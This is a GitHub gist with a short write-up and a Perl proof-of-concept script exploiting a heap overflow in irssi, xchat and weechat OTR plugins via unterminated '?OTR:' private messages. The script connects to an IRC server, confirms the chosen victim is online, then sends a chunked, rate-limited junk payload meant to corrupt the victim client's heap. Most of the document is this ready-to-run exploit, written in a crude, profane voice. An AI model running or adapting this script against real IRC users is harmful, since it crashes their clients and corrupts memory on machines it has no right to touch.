Skip to content

Instantly share code, notes, and snippets.

@compoterhacker

compoterhacker/KEK.md

Created March 9, 2016 21:25
Show Gist options
  • Save compoterhacker/c1a3b15fe2a47393083b to your computer and use it in GitHub Desktop.
Save compoterhacker/c1a3b15fe2a47393083b to your computer and use it in GitHub Desktop.
Download ZIP
old ass irssi-otr heap exploit
Raw
KEK.md

OLD ASS nonsense, but in the spirit of hacking otr...

irssi/xchat/weechat-otr include a heap corruption vulnerability, which is triggered when a PRIVMSG is sent to a victim with "?OTR:", but without a terminating char such as "." or ",". The plug-in will then sit and wait for the rest of the message to come in -- thinking it's just SUPER FUCKING LONG -- waiting for the "." or "," terminator, which never comes.

This allows us to load a junkshot 440 chars at a time via PM, adding to the msg buffer, eventually overflowing and corrupting the fuck outta mem.

PoC works but i dont really give a fuck about this bug because no one uses this shit.

Raw
kek.pl
#!/usr/bin/perl
#
# irssi/xchat/weechat-otr plugin heap overflow PoC
# no one uses this shit so whatever
#
use strict;
use warnings;
use IO::Socket;
system('clear');
print " __ __[irssi + xchat]__ \r\n";
print " _\\ \\\\ \\__ [otr] /'_ `\\ \r\n";
print "/\\__ _ _\\ ______/\\ \\L\\ \\\r\n";
print "\\/_L\\ \\\\ \\L_/\\ '__`\\ \\___, \\\r\n";
print " /\\_ _ _\\ \\ \\L\\ \\/__,/\\ \\ \r\n";
print " \\/_/\\_\\\\_\\/\\ \\ ,__/ \\ \\_\\\r\n";
print " \\/_//_/ \\ \\ \\/[heap]\\/_/\r\n";
print " [remote] \\ \\_\\[poop] \r\n";
print " \\/_/ \r\n";
if(@ARGV != 2){
die "[-] Usage: perl $0 <server> <target>\n";
}
my $server = $ARGV[0];
my $nickname = "pewpew";
my $username = "imgay";
my $target = $ARGV[1];
my $line;
# slicing up the junkshot into differnet chars makes it not look like a flood, which
# seemed to be a problem on Unreal w/irssi.
my $buf = 'A'x1178 . 'B'x1178 . 'C'x1178 . 'D'x1178 . 'A'x1178 . 'B'x1178 . 'C'x1178;
$buf .= 'D'x1178;
#my $buff = 'A'x9424;
my $junkshot = $buf . '\xff'x7;
warn "$@\n" if $@;
my $sock = IO::Socket::INET->new(
PeerAddr => $server,
PeerPort => 6667,
Proto => 'tcp' ) or die "pee";
while($line = <$sock>){
if($line =~ /NOTICE AUTH/){
print $sock "NICK $nickname\nUSER $username 0 0 :kindsoul\n";
}
if($line =~ /^PING/){
print $sock "PONG :" . (split(/ :/, $line))[1] . "\n";
last;
}
}
print "[+] Connected to $server, seeing if $target is alive and ready to recieve...\n";
while($line = <$sock>){
print $sock "WHOIS $target\n";
if($line =~ /401/){
die "\n[-] Target: $target not online. Aborting.\n\n";
}
elsif($line =~ /311/){
last;
}
}
print "[+] All systems go, prepping $target for junkshot!\n";
print "[+] Junkshot must be rate-limited, so it'll take a few minutes...\n";
my $front = substr($junkshot, 0, 435);
$junkshot = substr($junkshot, length($front), length($junkshot));
print $sock "PRIVMSG $target :?OTR:$front"; # ending the OG junkshot with \n stops the crash...?
while ($junkshot) {
$front = substr($junkshot, 0, 440);
$junkshot = substr($junkshot, length($front), length($junkshot));
print $sock "PRIVMSG $target :$front\r\n";
sleep 6; # rate limit, but victim won't even recv messages if plugin is loaded
}
print "\n[+] Junkshot delivered!\n\n"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment